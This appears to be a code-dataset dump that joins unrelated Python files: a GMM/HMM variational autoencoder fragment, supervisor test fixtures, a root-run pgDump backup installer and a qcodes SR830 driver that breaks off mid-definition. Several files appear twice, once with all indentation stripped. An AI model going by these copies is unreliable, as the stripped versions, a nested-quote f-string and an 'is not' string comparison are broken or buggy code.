        )
        review['losses'].update(dict(
            kld=kld.mean(),
            class_ce=class_ce.mean(),
            log_class_prob=self.gmm.log_class_probs.sum()
        ))
        review['scalars'] = dict(
            classes=classes.flatten(),
        )
        if self.label_key is not None:
            labels = inputs[self.label_key]
            review['scalars'].update(dict(
                labels=labels.flatten()
            ))
        review['histograms'].update(dict(
            kld_=kld.flatten(),
            log_class_probs_=self.gmm.log_class_probs.flatten(),
            max_class_posterior_=max_class_posterior.flatten(),
            classes_=classes.flatten()
        ))
        return review
    def modify_summary(self, summary):
        # Aggregate frame-wise class predictions into clustering metrics.
        predictions = summary['scalars'].pop('classes', None)
        if predictions is not None:
            summary['scalars']['n_classes'] = len(np.unique(predictions))
        labels = summary['scalars'].pop('labels', None)
        if predictions is not None and labels is not None:
            _, labels = np.unique(labels, return_inverse=True)
            _, predictions = np.unique(predictions, return_inverse=True)
            contingency_matrix = metrics.cluster.contingency_matrix(
                labels, predictions
            )
            # normalized mutual information: (H(y) - H(y|c)) / H(y)
            p_true_pred = contingency_matrix / contingency_matrix.sum()
            p_true = p_true_pred.sum(axis=1, keepdims=True)
            p_true_given_pred = contingency_matrix / np.maximum(contingency_matrix.sum(axis=0, keepdims=True), 1)
            h_true = -np.sum(p_true * np.log(np.maximum(p_true, 1e-12)))
            h_true_given_pred = -np.sum(p_true_pred * np.log(np.maximum(p_true_given_pred, 1e-12)))
            nmi = (h_true - h_true_given_pred) / h_true
            summary['scalars']['nmi'] = nmi
            # accuracy after majority-vote mapping of clusters to labels
            prediction_mapping = np.argmax(contingency_matrix, axis=0)
            predictions = prediction_mapping[predictions]
            summary['scalars']['accuracy'] = np.mean(predictions == labels)
        summary = super().modify_summary(summary)
        return summary
    @classmethod
    def finalize_dogmatic_config(cls, config):
        super().finalize_dogmatic_config(config)
        # GMM feature size must match the decoder's latent input dimension.
        if config['decoder']['factory'] == HybridCNNTranspose:
            config['gmm'] = {
                'factory': GMM,
                'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
            }
        elif config['decoder']['factory'] == CNNTranspose1d:
            config['gmm'] = {
                'factory': GMM,
                'feature_size': config['decoder']['in_channels']
            }
class HMMVAE(GMMVAE):
    """
    >>> config = HMMVAE.get_config(dict(\
            encoder=dict(\
                factory=HybridCNN,\
                input_size=80,\
                cnn_2d=dict(\
                    in_channels=1, out_channels=3*[32], kernel_size=3, \
                ), \
                cnn_1d=dict(\
                    out_channels=3*[32], kernel_size=3\
                ),\
            ),\
            decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
            hmm=dict(num_units=10, viterbi_training=True, final_state=True, initial_state=True),\
            feature_extractor=dict(\
                factory=NormalizedLogMelExtractor,\
                sample_rate=16000,\
                fft_length=512,\
                n_mels=80,\
            ),\
        ))
    >>> config['encoder']['cnn_1d']['in_channels']
    2560
    >>> config['encoder']['cnn_1d']['out_channels']
    [32, 32, 32]
    >>> config['decoder']['cnn_transpose_1d']['in_channels']
    16
    >>> hmmvae = HMMVAE.from_config(config)
    >>> inputs = {'stft': torch.rand((4, 1, 100, 257, 2)), 'seq_len': None}
    >>> outputs = hmmvae(inputs)
    >>> outputs[0][0].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[0][1].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[1][0][0].shape
    torch.Size([4, 16, 100])
    >>> outputs[1][0][1].shape
    torch.Size([4, 16, 100])
    >>> outputs[2][0].shape
    torch.Size([4, 100, 30])
    >>> outputs[2][1].shape
    torch.Size([4, 30, 30])
    >>> outputs[2][2].shape
    torch.Size([4, 100, 30])
    >>> review = hmmvae.review(inputs, outputs)
    """
    def __init__(
            self, encoder: HybridCNN, decoder: HybridCNNTranspose, hmm: HMM, *,
            feature_key='stft', feature_extractor=None, feature_size=None,
            label_key=None, supervised=False,
    ):
        # Skip GMMVAE.__init__ (which would require a GMM) and initialize the
        # plain VAE directly; the latent prior here is an HMM instead.
        super(GMMVAE, self).__init__(
            encoder=encoder, decoder=decoder,
            feature_key=feature_key, feature_extractor=feature_extractor,
            feature_size=feature_size,
        )
        self.hmm = hmm
        self.label_key = label_key
        self.supervised = supervised
    def forward(self, inputs):
        # Run the plain VAE forward (bypassing GMMVAE.forward) and score the
        # approximate posterior under the HMM.
        (x, x_hat), ((mu, log_var), seq_len) = super(GMMVAE, self).forward(inputs)
        qz = Normal(
            loc=mu.permute((0, 2, 1)),
            scale=torch.exp(0.5 * log_var.permute((0, 2, 1)))
        )
        # in supervised training the unit sequence is taken from the labels
        unit_sequence = inputs[self.label_key] if (self.supervised and self.training) else None
        no_onset = inputs['no_onset'] if 'no_onset' in inputs else False
        no_offset = inputs['no_offset'] if 'no_offset' in inputs else False
        class_posterior, transitions, log_rho = self.hmm(
            qz, seq_len=seq_len, unit_sequence=unit_sequence,
            no_onset=no_onset, no_offset=no_offset
        )
        return (x, x_hat), ((mu, log_var), seq_len), (class_posterior, transitions, log_rho)
    def review(self, inputs, outputs):
        # Reuse VAE.review (bypassing GMMVAE.review) for the reconstruction
        # terms; HMM-specific terms are added below.
        review = super(GMMVAE, self).review(inputs, outputs)
        _, (params, seq_len), (class_posterior, transitions, log_rho) = outputs
        kld = -(class_posterior * log_rho).sum(-1)
        kld = Mean(axis=-1)(kld, seq_len)
        # clamp log-probs at -100 so -inf cannot propagate into the losses
        log_class_probs = torch.max(self.hmm.log_class_probs, -100 * torch.ones_like(self.hmm.log_class_probs))
        log_transition_mat = torch.max(self.hmm.log_transition_mat, -100 * torch.ones_like(self.hmm.log_transition_mat))
        class_ce = -(class_posterior[:, 0] * log_class_probs).sum(-1) - (transitions*log_transition_mat).sum((1,2))
        class_ce = class_ce / (transitions.sum((1, 2)) + 1)
        max_class_posterior, classes = torch.max(class_posterior, -1)
        review['losses'].update(dict(
            kld=kld.mean(),
            class_ce=class_ce.mean(),
            log_class_prob=log_class_probs.sum(),
        ))
        review['scalars'] = dict(
            # map HMM states to their unit index for monitoring
            classes=classes.flatten()//self.hmm.states_per_unit,
        )
        review['histograms'].update(dict(
            kld_=kld.flatten(),
            log_class_probs_=log_class_probs.flatten(),
            max_class_posterior_=max_class_posterior.flatten(),
            classes_=classes.flatten()
        ))
        if self.label_key is not None:
            labels = inputs[self.label_key]
            review['scalars'].update(dict(
                labels=labels.flatten()
            ))
        return review
    @classmethod
    def finalize_dogmatic_config(cls, config):
        # Reuse VAE's finalization (skip GMMVAE's, which would add a GMM).
        super(GMMVAE, cls).finalize_dogmatic_config(config)
        if config['decoder']['factory'] == HybridCNNTranspose:
            config['hmm'] = {
                'factory': HMM,
                'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
            }
        elif config['decoder']['factory'] == CNNTranspose1d:
            config['hmm'] = {
                'factory': HMM,
                'feature_size': config['decoder']['in_channels']
            }
|
"""Common test functions."""
from pathlib import Path
import re
from unittest.mock import AsyncMock, MagicMock, PropertyMock, patch
from uuid import uuid4
from aiohttp import web
from aiohttp.test_utils import TestClient
import pytest
from supervisor.api import RestAPI
from supervisor.bootstrap import initialize_coresys
from supervisor.coresys import CoreSys
from supervisor.dbus.network import NetworkManager
from supervisor.docker import DockerAPI
from supervisor.utils.gdbus import DBus
from tests.common import exists_fixture, load_fixture, load_json_fixture
# pylint: disable=redefined-outer-name, protected-access
@pytest.fixture
def docker() -> DockerAPI:
    """Mock DockerAPI."""
    # One locally "available" supervisor image so image lookups succeed.
    images = [MagicMock(tags=["openpeerpower/amd64-oppio-supervisor:latest"])]
    # Patch every docker entry point so DockerAPI() never contacts a real
    # docker daemon during tests.
    with patch("docker.DockerClient", return_value=MagicMock()), patch(
        "supervisor.docker.DockerAPI.images", return_value=MagicMock()
    ), patch("supervisor.docker.DockerAPI.containers", return_value=MagicMock()), patch(
        "supervisor.docker.DockerAPI.api", return_value=MagicMock()
    ), patch(
        "supervisor.docker.DockerAPI.images.list", return_value=images
    ), patch(
        "supervisor.docker.DockerAPI.info",
        return_value=MagicMock(),
    ), patch(
        "supervisor.docker.DockerConfig",
        return_value=MagicMock(),
    ):
        docker_obj = DockerAPI()
        # Plausible daemon metadata expected by supervisor code paths.
        docker_obj.info.logging = "journald"
        docker_obj.info.storage = "overlay2"
        docker_obj.info.version = "1.0.0"
        docker_obj.config.registries = {}
        yield docker_obj
@pytest.fixture
def dbus() -> DBus:
    """Mock DBUS.

    Patches the low-level gdbus helpers so every D-Bus interaction is served
    from local fixture files instead of a real bus, and yields the list of
    issued command fixture names for assertions.
    """
    dbus_commands = []
    async def mock_get_properties(dbus_obj, interface):
        # Properties come from "<interface with dots as underscores>
        # [_<object index>].json".
        latest = dbus_obj.object_path.split("/")[-1]
        fixture = interface.replace(".", "_")
        if latest.isnumeric():
            fixture = f"{fixture}_{latest}"
        return load_json_fixture(f"{fixture}.json")
    async def mock_wait_signal(_, __):
        # Signals resolve immediately in tests.
        pass
    async def mock_send(_, command, silent=False):
        if silent:
            return ""
        # Derive the fixture name from the object path in the gdbus command.
        fixture = command[6].replace("/", "_")[1:]
        if command[1] == "introspect":
            filetype = "xml"
            if not exists_fixture(f"{fixture}.{filetype}"):
                fixture = re.sub(r"_[0-9]+$", "", fixture)
                # special case
                if exists_fixture(f"{fixture}_*.{filetype}"):
                    fixture = f"{fixture}_*"
        else:
            # Use single quotes inside the f-string: reusing the enclosing
            # double quotes is a SyntaxError before Python 3.12 (PEP 701).
            fixture = f"{fixture}-{command[10].split('.')[-1]}"
            filetype = "fixture"
            dbus_commands.append(fixture)
        return load_fixture(f"{fixture}.{filetype}")
    with patch("supervisor.utils.gdbus.DBus._send", new=mock_send), patch(
        "supervisor.utils.gdbus.DBus.wait_signal", new=mock_wait_signal
    ), patch(
        "supervisor.dbus.interface.DBusInterface.is_connected",
        return_value=True,
    ), patch(
        "supervisor.utils.gdbus.DBus.get_properties", new=mock_get_properties
    ):
        yield dbus_commands
@pytest.fixture
async def network_manager(dbus) -> NetworkManager:
    """Mock NetworkManager."""
    nm_obj = NetworkManager()
    # NOTE(review): `dbus` is the command-recording list yielded by the dbus
    # fixture; assigning it presumably just activates the patched D-Bus layer
    # for connect()/update() — confirm against NetworkManager's usage.
    nm_obj.dbus = dbus
    # Init
    await nm_obj.connect()
    await nm_obj.update()
    yield nm_obj
@pytest.fixture
async def coresys(loop, docker, network_manager, aiohttp_client) -> CoreSys:
    """Create a CoreSys Mock."""
    # Bypass filesystem setup, diagnostics and network calls during bootstrap.
    with patch("supervisor.bootstrap.initialize_system_data"), patch(
        "supervisor.bootstrap.setup_diagnostics"
    ), patch(
        "supervisor.bootstrap.fetch_timezone",
        return_value="Europe/Zurich",
    ), patch(
        "aiohttp.ClientSession",
        return_value=TestClient.session,
    ):
        coresys_obj = await initialize_coresys()
    # Mock save json
    coresys_obj._ingress.save_data = MagicMock()
    coresys_obj._auth.save_data = MagicMock()
    coresys_obj._updater.save_data = MagicMock()
    coresys_obj._config.save_data = MagicMock()
    coresys_obj._jobs.save_data = MagicMock()
    # Mock test client
    coresys_obj.arch._default_arch = "amd64"
    coresys_obj._machine = "qemux86-64"
    coresys_obj._machine_id = uuid4()
    # Mock host communication
    coresys_obj._dbus._network = network_manager
    # Mock docker
    coresys_obj._docker = docker
    # Set internet state
    coresys_obj.supervisor._connectivity = True
    coresys_obj.host.network._connectivity = True
    yield coresys_obj
@pytest.fixture
def sys_machine():
    """Mock sys_machine."""
    # Replace the CoreSys.machine property and hand the mock to the test.
    machine_patcher = patch(
        "supervisor.coresys.CoreSys.machine", new_callable=PropertyMock
    )
    machine_mock = machine_patcher.start()
    try:
        yield machine_mock
    finally:
        machine_patcher.stop()
@pytest.fixture
def sys_supervisor():
    """Mock sys_supervisor."""
    with patch(
        "supervisor.coresys.CoreSys.supervisor", new_callable=PropertyMock
    ) as mock:
        mock.return_value = MagicMock()
        # NOTE(review): this yields the MagicMock *class*, not the property
        # mock instance — verify callers don't expect `mock` here.
        yield MagicMock
@pytest.fixture
async def api_client(aiohttp_client, coresys: CoreSys):
    """Fixture for RestAPI client."""
    api = RestAPI(coresys)
    api.webapp = web.Application()
    # Prevent the API from actually binding a site/runner.
    api.start = AsyncMock()
    await api.load()
    # Hand out an aiohttp test client bound to the (in-memory) webapp.
    yield await aiohttp_client(api.webapp)
@pytest.fixture
def store_manager(coresys: CoreSys):
    """Fixture for the store manager."""
    # Hand out the real store manager but stub out repository data updates.
    manager = coresys.store
    update_patcher = patch(
        "supervisor.store.data.StoreData.update", return_value=MagicMock()
    )
    update_patcher.start()
    try:
        yield manager
    finally:
        update_patcher.stop()
@pytest.fixture
def run_dir(tmp_path):
"""Fixture to inject oppio env."""
with patch("supervisor.core.RUN_SUPERVISOR_STATE") as mock_run:
tmp_state = Path(tmp_path, "supervisor")
mock_run.write_text = tmp_state.write_text
yield tmp_state
| """Common test functions."""
from pathlib import Path
import re
from unittest.mock import AsyncMock, MagicMock, PropertyMock, patch
from uuid import uuid4
from aiohttp import web
from aiohttp.test_utils import TestClient
import pytest
from supervisor.api import RestAPI
from supervisor.bootstrap import initialize_coresys
from supervisor.coresys import CoreSys
from supervisor.dbus.network import NetworkManager
from supervisor.docker import DockerAPI
from supervisor.utils.gdbus import DBus
from tests.common import exists_fixture, load_fixture, load_json_fixture
# pylint: disable=redefined-outer-name, protected-access
@pytest.fixture
def docker() -> DockerAPI:
"""Mock DockerAPI."""
images = [MagicMock(tags=["openpeerpower/amd64-oppio-supervisor:latest"])]
with patch("docker.DockerClient", return_value=MagicMock()), patch(
"supervisor.docker.DockerAPI.images", return_value=MagicMock()
), patch("supervisor.docker.DockerAPI.containers", return_value=MagicMock()), patch(
"supervisor.docker.DockerAPI.api", return_value=MagicMock()
), patch(
"supervisor.docker.DockerAPI.images.list", return_value=images
), patch(
"supervisor.docker.DockerAPI.info",
return_value=MagicMock(),
), patch(
"supervisor.docker.DockerConfig",
return_value=MagicMock(),
):
docker_obj = DockerAPI()
docker_obj.info.logging = "journald"
docker_obj.info.storage = "overlay2"
docker_obj.info.version = "1.0.0"
docker_obj.config.registries = {}
yield docker_obj
@pytest.fixture
def dbus() -> DBus:
"""Mock DBUS."""
dbus_commands = []
async def mock_get_properties(dbus_obj, interface):
latest = dbus_obj.object_path.split("/")[-1]
fixture = interface.replace(".", "_")
if latest.isnumeric():
fixture = f"{fixture}_{latest}"
return load_json_fixture(f"{fixture}.json")
async def mock_wait_signal(_, __):
pass
async def mock_send(_, command, silent=False):
if silent:
return ""
fixture = command[6].replace("/", "_")[1:]
if command[1] == "introspect":
filetype = "xml"
if not exists_fixture(f"{fixture}.{filetype}"):
fixture = re.sub(r"_[0-9]+$", "", fixture)
# special case
if exists_fixture(f"{fixture}_*.{filetype}"):
fixture = f"{fixture}_*"
else:
fixture = f"{fixture}-{command[10].split('.')[-1]}"
filetype = "fixture"
dbus_commands.append(fixture)
return load_fixture(f"{fixture}.{filetype}")
with patch("supervisor.utils.gdbus.DBus._send", new=mock_send), patch(
"supervisor.utils.gdbus.DBus.wait_signal", new=mock_wait_signal
), patch(
"supervisor.dbus.interface.DBusInterface.is_connected",
return_value=True,
), patch(
"supervisor.utils.gdbus.DBus.get_properties", new=mock_get_properties
):
yield dbus_commands
@pytest.fixture
async def network_manager(dbus) -> NetworkManager:
"""Mock NetworkManager."""
nm_obj = NetworkManager()
nm_obj.dbus = dbus
# Init
await nm_obj.connect()
await nm_obj.update()
yield nm_obj
@pytest.fixture
async def coresys(loop, docker, network_manager, aiohttp_client) -> CoreSys:
"""Create a CoreSys Mock."""
with patch("supervisor.bootstrap.initialize_system_data"), patch(
"supervisor.bootstrap.setup_diagnostics"
), patch(
"supervisor.bootstrap.fetch_timezone",
return_value="Europe/Zurich",
), patch(
"aiohttp.ClientSession",
return_value=TestClient.session,
):
coresys_obj = await initialize_coresys()
# Mock save json
coresys_obj._ingress.save_data = MagicMock()
coresys_obj._auth.save_data = MagicMock()
coresys_obj._updater.save_data = MagicMock()
coresys_obj._config.save_data = MagicMock()
coresys_obj._jobs.save_data = MagicMock()
# Mock test client
coresys_obj.arch._default_arch = "amd64"
coresys_obj._machine = "qemux86-64"
coresys_obj._machine_id = uuid4()
# Mock host communication
coresys_obj._dbus._network = network_manager
# Mock docker
coresys_obj._docker = docker
# Set internet state
coresys_obj.supervisor._connectivity = True
coresys_obj.host.network._connectivity = True
yield coresys_obj
@pytest.fixture
def sys_machine():
"""Mock sys_machine."""
with patch("supervisor.coresys.CoreSys.machine", new_callable=PropertyMock) as mock:
yield mock
@pytest.fixture
def sys_supervisor():
"""Mock sys_supervisor."""
with patch(
"supervisor.coresys.CoreSys.supervisor", new_callable=PropertyMock
) as mock:
mock.return_value = MagicMock()
yield MagicMock
@pytest.fixture
async def api_client(aiohttp_client, coresys: CoreSys):
"""Fixture for RestAPI client."""
api = RestAPI(coresys)
api.webapp = web.Application()
api.start = AsyncMock()
await api.load()
yield await aiohttp_client(api.webapp)
@pytest.fixture
def store_manager(coresys: CoreSys):
"""Fixture for the store manager."""
sm_obj = coresys.store
with patch("supervisor.store.data.StoreData.update", return_value=MagicMock()):
yield sm_obj
@pytest.fixture
def run_dir(tmp_path):
"""Fixture to inject oppio env."""
with patch("supervisor.core.RUN_SUPERVISOR_STATE") as mock_run:
tmp_state = Path(tmp_path, "supervisor")
mock_run.write_text = tmp_state.write_text
yield tmp_state
|
from os import getuid, system, mkdir, popen, setuid, setgid
from pathlib import Path
def run_command(command: str):
status = system(command)
if status != 0:
exit(status)
if getuid() != 0:
print("You must run it as root")
exit(1)
if Path("/etc/debian_version").exists():
# Ubuntu/Debian
run_command("apt install -y cron python3-venv")
elif Path("/etc/system-release").exists():
# CentOS
run_command("dnf install -y crontabs")
else:
print("Your OS is not supported")
exit(1)
if not Path("/opt/pgDump/").exists():
mkdir("/opt/pgDump/")
run_command("groupadd -f pgDump")
if system("id -u pgDump") == 256:
run_command("useradd -g pgDump -G docker -b /opt/pgDump/ pgDump")
uid = int(popen("id -u pgDump").read())
gid = int(popen("id -g pgDump").read())
if Path("/opt/pgDump/venv").exists():
run_command("rm -r /opt/pgDump/venv")
run_command("python3 -m venv /opt/pgDump/venv; . /opt/pgDump/venv/bin/activate; pip install -r requirements.txt")
run_command("cp -r src/* /opt/pgDump/")
run_command(f"cp {"config.yml" if Path("config.yml").exists() else "config.sample.yml"} /opt/pgDump/config.yml")
run_command("chown -R pgDump:pgDump /opt/pgDump/")
setgid(gid)
setuid(uid)
system("crontab -l > /opt/pgDump/mycron")
try:
with Path("/opt/pgDump/mycron").open("r") as f:
if "pgDump" not in f.read():
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py >>/opt/pgDump/log 2>&1\n")
except FileNotFoundError:
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py\n")
run_command("crontab /opt/pgDump/mycron")
run_command("rm /opt/pgDump/mycron")
| from os import getuid, system, mkdir, popen, setuid, setgid
from pathlib import Path
def run_command(command: str):
status = system(command)
if status != 0:
exit(status)
if getuid() != 0:
print("You must run it as root")
exit(1)
if Path("/etc/debian_version").exists():
# Ubuntu/Debian
run_command("apt install -y cron python3-venv")
elif Path("/etc/system-release").exists():
# CentOS
run_command("dnf install -y crontabs")
else:
print("Your OS is not supported")
exit(1)
if not Path("/opt/pgDump/").exists():
mkdir("/opt/pgDump/")
run_command("groupadd -f pgDump")
if system("id -u pgDump") == 256:
run_command("useradd -g pgDump -G docker -b /opt/pgDump/ pgDump")
uid = int(popen("id -u pgDump").read())
gid = int(popen("id -g pgDump").read())
if Path("/opt/pgDump/venv").exists():
run_command("rm -r /opt/pgDump/venv")
run_command("python3 -m venv /opt/pgDump/venv; . /opt/pgDump/venv/bin/activate; pip install -r requirements.txt")
run_command("cp -r src/* /opt/pgDump/")
run_command(f"cp {'config.yml' if Path('config.yml').exists() else 'config.sample.yml'} /opt/pgDump/config.yml")
run_command("chown -R pgDump:pgDump /opt/pgDump/")
setgid(gid)
setuid(uid)
system("crontab -l > /opt/pgDump/mycron")
try:
with Path("/opt/pgDump/mycron").open("r") as f:
if "pgDump" not in f.read():
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py >>/opt/pgDump/log 2>&1\n")
except FileNotFoundError:
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py\n")
run_command("crontab /opt/pgDump/mycron")
run_command("rm /opt/pgDump/mycron")
|
from functools import partial
import numpy as np
from qcodes import VisaInstrument
from qcodes.instrument.parameter import ArrayParameter
from qcodes.utils.validators import Numbers, Ints, Enum, Strings
from typing import Tuple
class ChannelBuffer(ArrayParameter):
"""
Parameter class for the two channel buffers
Currently always returns the entire buffer
TODO (WilliamHPNielsen): Make it possible to query parts of the buffer.
The instrument natively supports this in its TRCL call.
"""
def __init__(self, name: str, instrument: 'SR830', channel: int) -> None:
"""
Args:
name (str): The name of the parameter
instrument (SR830): The parent instrument
channel (int): The relevant channel (1 or 2). The name should
should match this.
"""
self._valid_channels = (1, 2)
if channel not in self._valid_channels:
raise ValueError('Invalid channel specifier. SR830 only has '
'channels 1 and 2.')
if not isinstance(instrument, SR830):
raise ValueError('Invalid parent instrument. ChannelBuffer '
'can only live on an SR830.')
super().__init__(name,
shape=(1,), # dummy initial shape
unit='V', # dummy initial unit
setpoint_names=('Time',),
setpoint_labels=('Time',),
setpoint_units=('s',),
docstring='Holds an acquired (part of the) '
'data buffer of one channel.')
self.channel = channel
self._instrument = instrument
def prepare_buffer_readout(self):
"""
Function to generate the setpoints for the channel buffer and
get the right units
"""
N = self._instrument.buffer_npts() # problem if this is zero?
# TODO (WilliamHPNielsen): what if SR was changed during acquisition?
SR = self._instrument.buffer_SR()
if SR == 'Trigger':
self.setpoint_units = ('',)
self.setpoint_names = ('trig_events',)
self.setpoint_labels = ('Trigger event number',)
self.setpoints = (tuple(np.arange(0, N)),)
else:
dt = 1/SR
self.setpoint_units = ('s',)
self.setpoint_names = ('Time',)
self.setpoint_labels = ('Time',)
self.setpoints = (tuple(np.linspace(0, N*dt, N)),)
self.shape = (N,)
params = self._instrument.parameters
# YES, it should be: "is not 'none'" NOT "is not None"
if params['ch{}_ratio'.format(self.channel)].get() is not 'none':
self.unit = '%'
else:
disp = params['ch{}_display'.format(self.channel)].get()
if disp == 'Phase':
self.unit = 'deg'
else:
self.unit = 'V'
if self.channel == 1:
self._instrument._buffer1_ready = True
else:
self._instrument._buffer2_ready = True
def get_raw(self):
"""
Get command. Returns numpy array
"""
if self.channel == 1:
ready = self._instrument._buffer1_ready
else:
ready = self._instrument._buffer2_ready
if not ready:
raise RuntimeError('Buffer not ready. Please run '
'prepare_buffer_readout')
N = self._instrument.buffer_npts()
if N == 0:
raise ValueError('No points stored in SR830 data buffer.'
' Can not poll anything.')
# poll raw binary data
self._instrument.write('TRCL ? {}, 0, {}'.format(self.channel, N))
rawdata = self._instrument.visa_handle.read_raw()
# parse it
realdata = np.fromstring(rawdata, dtype='<i2')
numbers = realdata[::2]*2.0**(realdata[1::2]-124)
if self.shape[0] != N:
raise RuntimeError("SR830 got {} points in buffer expected {}".format(N, self.shape[0]))
return numbers
class SR830(VisaInstrument):
"""
This is the qcodes driver for the Stanford Research Systems SR830
Lock-in Amplifier
"""
_VOLT_TO_N = {2e-9: 0, 5e-9: 1, 10e-9: 2,
20e-9: 3, 50e-9: 4, 100e-9: 5,
200e-9: 6, 500e-9: 7, 1e-6: 8,
2e-6: 9, 5e-6: 10, 10e-6: 11,
20e-6: 12, 50e-6: 13, 100e-6: 14,
200e-6: 15, 500e-6: 16, 1e-3: 17,
2e-3: 18, 5e-3: 19, 10e-3: 20,
20e-3: 21, 50e-3: 22, 100e-3: 23,
200e-3: 24, 500e-3: 25, 1: 26}
_N_TO_VOLT = {v: k for k, v in _VOLT_TO_N.items()}
_CURR_TO_N = {2e-15: 0, 5e-15: 1, 10e-15: 2,
20e-15: 3, 50e-15: 4, 100e-15: 5,
200e-15: 6, 500e-15: 7, 1e-12: 8,
2e-12: 9, 5e-12: 10, 10e-12: 11,
20e-12: 12, 50e-12: 13, 100e-12: 14,
200e-12: 15, 500e-12: 16, 1e-9: 17,
2e-9: 18, 5e-9: 19, 10e-9: 20,
20e-9: 21, 50e-9: 22, 100e-9: 23,
200e-9: 24, 500e-9: 25, 1e-6: 26}
_N_TO_CURR = {v: k for k, v in _CURR_TO_N.items()}
_VOLT_ENUM = Enum(*_VOLT_TO_N.keys())
_CURR_ENUM = Enum(*_CURR_TO_N.keys())
_INPUT_CONFIG_TO_N = {
'a': 0,
'a-b': 1,
'I 1M': 2,
'I 100M': 3,
}
_N_TO_INPUT_CONFIG = {v: k for k, v in _INPUT_CONFIG_TO_N.items()}
def __init__(self, name, address, **kwargs):
super().__init__(name, address, **kwargs)
# Reference and phase
self.add_parameter('phase',
label='Phase',
get_cmd='PHAS?',
get_parser=float,
set_cmd='PHAS {:.2f}',
unit='deg',
vals=Numbers(min_value=-360, max_value=729.99))
self.add_parameter('reference_source',
label='Reference source',
get_cmd='FMOD?',
set_cmd='FMOD {}',
val_mapping={
'external': 0,
'internal': 1,
},
vals=Enum('external', 'internal'))
self.add_parameter('frequency',
label='Frequency',
get_cmd='FREQ?',
get_parser=float,
set_cmd='FREQ {:.4f}',
unit='Hz',
vals=Numbers(min_value=1e-3, max_value=102e3))
self.add_parameter('ext_trigger',
label='External trigger',
get_cmd='RSLP?',
set_cmd='RSLP {}',
val_mapping={
'sine': 0,
'TTL rising': 1,
'TTL falling': 2,
})
self.add_parameter('harmonic',
label='Harmonic',
get_cmd='HARM?',
get_parser=int,
set_cmd='HARM {:d}',
vals=Ints(min_value=1, max_value=19999))
self.add_parameter('amplitude',
label='Amplitude',
get_cmd='SLVL?',
get_parser=float,
set_cmd='SLVL {:.3f}',
unit='V',
vals=Numbers(min_value=0.004, max_value=5.000))
# Input and filter
self.add_parameter('input_config',
label='Input configuration',
get_cmd='ISRC?',
get_parser=self._get_input_config,
set_cmd='ISRC {}',
set_parser=self._set_input_config,
vals=Enum(*self._INPUT_CONFIG_TO_N.keys()))
self.add_parameter('input_shield',
label='Input shield',
get_cmd='IGND?',
set_cmd='IGND {}',
val_mapping={
'float': 0,
'ground': 1,
})
self.add_parameter('input_coupling',
label='Input coupling',
get_cmd='ICPL?',
set_cmd='ICPL {}',
val_mapping={
'AC': 0,
'DC': 1,
})
self.add_parameter('notch_filter',
label='Notch filter',
get_cmd='ILIN?',
set_cmd='ILIN {}',
val_mapping={
'off': 0,
'line in': 1,
'2x line in': 2,
'both': 3,
})
# Gain and time constant
self.add_parameter(name='sensitivity',
label='Sensitivity',
get_cmd='SENS?',
set_cmd='SENS {:d}',
get_parser=self._get_sensitivity,
set_parser=self._set_sensitivity
)
self.add_parameter('reserve',
label='Reserve',
get_cmd='RMOD?',
set_cmd='RMOD {}',
val_mapping={
'high': 0,
'normal': 1,
'low noise': 2,
})
self.add_parameter('time_constant',
label='Time constant',
get_cmd='OFLT?',
set_cmd='OFLT {}',
unit='s',
val_mapping={
10e-6: 0, 30e-6: 1,
100e-6: 2, 300e-6: 3,
1e-3: 4, 3e-3: 5,
10e-3: 6, 30e-3: 7,
100e-3: 8, 300e-3: 9,
1: 10, 3: 11,
10: 12, 30: 13,
100: 14, 300: 15,
1e3: 16, 3e3: 17,
10e3: 18, 30e3: 19,
})
self.add_parameter('filter_slope',
label='Filter slope',
get_cmd='OFSL?',
set_cmd='OFSL {}',
unit='dB/oct',
val_mapping={
6: 0,
12: 1,
18: 2,
24: 3,
})
self.add_parameter('sync_filter',
label='Sync filter',
get_cmd='SYNC?',
set_cmd='SYNC {}',
val_mapping={
'off': 0,
'on': 1,
})
def parse_offset_get(s):
parts = s.split(',')
return float(parts[0]), int(parts[1])
# TODO: Parameters that can be set with multiple arguments
# For the OEXP command for example two arguments are needed
self.add_parameter('X_offset',
get_cmd='OEXP? 1',
get_parser=parse_offset_get)
self.add_parameter('Y_offset',
get_cmd='OEXP? 2',
get_parser=parse_offset_get)
self.add_parameter('R_offset',
get_cmd='OEXP? 3',
get_parser=parse_offset_get)
# Aux input/output
for i in [1, 2, 3, 4]:
self.add_parameter('aux_in{}'.format(i),
label='Aux input {}'.format(i),
get_cmd='OAUX? {}'.format(i),
get_parser=float,
unit='V')
self.add_parameter('aux_out{}'.format(i),
label='Aux output {}'.format(i),
get_cmd='AUXV? {}'.format(i),
get_parser=float,
set_cmd='AUXV {0}, {{}}'.format(i),
unit='V')
# Setup
self.add_parameter('output_interface',
label='Output interface',
get_cmd='OUTX?',
set_cmd='OUTX {}',
val_mapping={
'RS232': '0\n',
'GPIB': '1\n',
})
# Channel setup
for ch in range(1, 3):
# detailed validation and mapping performed in set/get functions
self.add_parameter('ch{}_ratio'.format(ch),
label='Channel {} ratio'.format(ch),
get_cmd=partial(self._get_ch_ratio, ch),
set_cmd=partial(self._set_ch_ratio, ch),
vals=Strings())
self.add_parameter('ch{}_display'.format(ch),
label='Channel {} display'.format(ch),
get_cmd=partial(self._get_ch_display, ch),
set_cmd=partial(self._set_ch_display, ch),
vals=Strings())
self.add_parameter('ch{}_databuffer'.format(ch),
channel=ch,
parameter_class=ChannelBuffer)
# Data transfer
self.add_parameter('X',
get_cmd='OUTP? 1',
get_parser=float,
unit='V')
self.add_parameter('Y',
get_cmd='OUTP? 2',
get_parser=float,
unit='V')
self.add_parameter('R',
get_cmd='OUTP? 3',
get_parser=float,
unit='V')
self.add_parameter('P',
get_cmd='OUTP? 4',
get_parser=float,
unit='deg')
# Data buffer settings
self.add_parameter('buffer_SR',
label='Buffer sample rate',
